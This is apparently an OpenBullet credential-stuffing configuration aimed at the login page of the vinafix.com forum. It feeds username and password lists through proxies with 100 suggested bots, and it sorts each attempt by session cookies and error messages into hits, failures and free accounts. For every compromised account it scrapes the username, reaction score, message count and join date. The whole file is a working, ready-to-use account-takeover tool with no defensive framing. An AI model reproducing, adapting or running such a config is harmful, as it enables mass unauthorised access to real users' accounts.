[SETTINGS]
{
  "Name": "vinafix",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-31T00:45:35.81289+02:00",
  "AdditionalInfo": "https://t.mw/Koko_Nader",
  "Author": "𝙶𝙴𝙾𝚁𝙶𝙴 𝙽𝙰𝙳𝙴𝚁 (🔥)/@Koko_Nader",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://vinafix.com/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#tk PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"_xfToken\" value=\"" "\"" -> VAR "tk" 

REQUEST POST "https://vinafix.com/login/login" 
  CONTENT "_xfToken=<tk>&login=<USER>&password=<PASS>&remember=1&_xfRedirect=https%3A%2F%2Fvinafix.com%2F" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 138" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://vinafix.com" 
  HEADER "referer: https://vinafix.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "xf_user" 
    KEY "<COOKIES{*}>" Contains "xf_session" 
    KEY "<a data-nav-id=\"profile\" href=\"/members/" 
  KEYCHAIN Failure OR 
    KEY "could not be found." 
    KEY "Incorrect password. Please try again." 
  KEYCHAIN Custom "FREE" OR 
    KEY "Your account will be automatically deleted after 5 days if you do not upgrade." 

PARSE "<SOURCE>" LR "<a data-nav-id=\"profile\" href=\"/members/" "/\"" -> VAR "Us" "https://vinafix.com/members/" "/" 

REQUEST GET "<Us>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<title>" "| Vinafix.com</title" CreateEmpty=FALSE -> CAP "Username" 

#1 PARSE "<SOURCE>" LR "<dt>Reaction score</dt>" "</dl>" -> VAR "1" 

PARSE "<1>" LR "<dd>" "</dd>" CreateEmpty=FALSE -> CAP "Reaction score" 

#1 PARSE "<SOURCE>" LR "<dt>Messages</dt>" "</dl>" -> VAR "1" 

PARSE "<SOURCE>" LR "u-concealed\">" "</a>" CreateEmpty=FALSE -> CAP "Messages" 

PARSE "<SOURCE>" LR "data-date-string=\"" "\"" CreateEmpty=FALSE -> CAP "Joined" 

FUNCTION Constant "𝙶𝙴𝙾𝚁𝙶𝙴 𝙽𝙰𝙳𝙴𝚁 (🔥)/@Koko_Nader" -> CAP "Checked By" 

